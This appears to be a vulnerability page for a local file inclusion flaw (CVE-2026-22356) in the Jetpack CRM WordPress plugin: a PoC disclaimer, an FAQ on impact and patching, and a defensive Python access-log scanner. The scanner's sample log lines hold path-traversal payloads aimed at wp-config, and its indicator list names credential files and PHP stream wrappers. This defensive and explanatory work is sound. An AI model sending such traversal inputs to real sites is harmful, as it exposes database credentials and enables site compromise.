This proof-of-concept is provided for educational and authorized security research purposes only.
You may not use this code against any system, application, or network without explicit prior authorization from the system owner.
Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.
This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.
By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.
Frequently Asked Questions
What is CVE-2026-22356?
Overview of the vulnerability
CVE-2026-22356 is a high-severity vulnerability in the Jetpack CRM plugin for WordPress, specifically versions up to and including 6.7.0. It allows unauthenticated attackers to exploit a Local File Inclusion (LFI) vulnerability, enabling them to include and execute arbitrary files on the server.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from unsanitized user input in the `subtab` parameter, which allows attackers to perform path traversal. By manipulating this parameter, an attacker can include sensitive files, such as the WordPress configuration file, leading to potential remote code execution.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Jetpack CRM plugin version 6.7.0 or earlier is at risk. Administrators should check their plugin version and update if necessary to mitigate the vulnerability.
How can I check if my site is vulnerable?
Version verification
To determine if your site is vulnerable, check the version of the Jetpack CRM plugin installed. If it is version 6.7.0 or earlier, your site is vulnerable and should be updated immediately.
What steps should I take to fix this vulnerability?
Updating the plugin
The vulnerability has been patched in version 6.7.1 of the Jetpack CRM plugin. Administrators should update to this version or later to ensure protection against the vulnerability.
What does the CVSS score of 8.1 indicate?
Understanding severity levels
A CVSS score of 8.1 indicates a high severity level, meaning the vulnerability poses a significant risk to affected systems. Exploitation could lead to serious consequences, including unauthorized access and data exposure.
What practical risks does this vulnerability pose?
Potential impacts of exploitation
Exploitation of this vulnerability can lead to remote code execution, allowing attackers to execute arbitrary PHP code on the server. This could result in data breaches, site compromise, and unauthorized access to sensitive information.
How does the proof of concept demonstrate the vulnerability?
Understanding the provided PoC
The proof of concept (PoC) illustrates how an attacker can exploit the vulnerability by sending crafted requests to the vulnerable endpoints. It shows how to include sensitive files and checks for successful exploitation by looking for database credentials in the response.
What are the recommended mitigation strategies?
Preventive measures
In addition to updating the plugin, administrators should deploy a web application firewall (WAF) to block malicious requests. Regular security audits and monitoring for unusual activity can also help mitigate risks.
Are there any additional security measures to consider?
Enhancing overall security
Beyond patching this specific vulnerability, site administrators should ensure that all plugins and themes are regularly updated, implement strong access controls, and consider using security plugins that offer additional layers of protection.
What if I cannot update the plugin immediately?
Temporary workarounds
If immediate updating is not possible, consider disabling the Jetpack CRM plugin until a safe update can be performed. Additionally, implementing a WAF rule to block requests that exploit this vulnerability can provide temporary protection.
Where can I find more information about this vulnerability?
Resources for further reading
Detailed information about CVE-2026-22356 can be found on the official CVE database, security advisories from Jetpack CRM, and various cybersecurity blogs that analyze vulnerabilities in WordPress plugins.
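For sites that cannot patch or deploy the WAF rule yet, a retrospective check of web server access logs is the other temporary measure. The added example below (not part of this page's tooling) applies the same normalisation and allowlist as the page's ModSecurity rules to constructed Apache-combined-format log lines and reports requests whose `subtab` value fails the 6.7.1 allowlist; the IP addresses, timestamps and request lines are constructed for the demo.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample lines (not from any real server), Apache combined format.
SAMPLE_LOG = """\
203.0.113.10 - - [01/Jan/2026:10:00:00 +0000] "GET /wp-admin/admin.php?page=zerobscrm-settings&tab=mailpoet&subtab=main HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.11 - - [01/Jan/2026:10:00:01 +0000] "GET /wp-admin/admin.php?page=zerobscrm-settings&tab=woosync&subtab=..%2F..%2F..%2F..%2Fwp-config HTTP/1.1" 200 9876 "-" "curl/8.0"
203.0.113.12 - - [01/Jan/2026:10:00:02 +0000] "GET /wp-admin/admin.php?page=zerobscrm-settings&tab=mailpoet&subtab=%252e%252e%252fsettings%252fmain HTTP/1.1" 200 300 "-" "python-requests/2.31"
203.0.113.13 - - [01/Jan/2026:10:00:03 +0000] "GET /wp-admin/admin-ajax.php?subtab=connections HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.14 - - [01/Jan/2026:10:00:04 +0000] "GET /index.php?p=1 HTTP/1.1" 200 100 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Endpoints that dispatch to the plugin's admin pages (from rule 202622356 on this page).
ADMIN_PATH_RE = re.compile(r'^/wp-admin/(admin-ajax\.php|admin\.php)$|^/index\.php/wp-admin/')
# The allowlist the 6.7.1 routers apply to subtab; fullmatch avoids the '$'-before-newline pitfall.
ALLOWED_SUBTAB = re.compile(r'[A-Za-z0-9_-]+')
# Traversal and stream-wrapper indicators used by the WAF rules on this page.
INDICATORS = ("../", "..\\", "\x00", "/etc/passwd", "/wp-config", "php://", "expect://")


def normalize(value: str, rounds: int = 3) -> str:
    """Percent-decode until the value stops changing (bounded), then lowercase.
    Mirrors t:urlDecode,t:lowercase while also unwrapping double encoding."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.lower()


def classify_subtab(raw: str):
    """Return a reason string if the subtab value looks like a CVE-2026-22356
    attempt, else None. As in the patch, anything outside the allowlist is
    rejected; an indicator hit only makes the reason more specific."""
    value = normalize(raw)
    hits = [i for i in INDICATORS if i in value]
    if hits:
        return f"traversal indicator {hits[0]!r}"
    if not ALLOWED_SUBTAB.fullmatch(value):
        return "subtab outside allowlist [A-Za-z0-9_-]+"
    return None


def analyze_log(text: str) -> list:
    """Scan access-log lines and return one finding per suspicious subtab value.
    POST bodies never reach the access log, so only query-string subtab is visible here."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        if not ADMIN_PATH_RE.search(parts.path):
            continue
        for key, value in parse_qsl(parts.query, keep_blank_values=True):
            if key != "subtab":
                continue
            reason = classify_subtab(value)
            if reason:
                findings.append({"ip": m["ip"], "time": m["ts"], "status": m["status"],
                                 "subtab": normalize(value), "reason": reason})
    return findings


if __name__ == "__main__":
    for f in analyze_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['time']} status={f['status']} subtab={f['subtab']!r}: {f['reason']}")
```

A status of 200 on a flagged request is not proof of success on its own (the vulnerable code also returned the "Could not load" warning with 200), so flagged sources should be correlated with file changes and new admin users on the host.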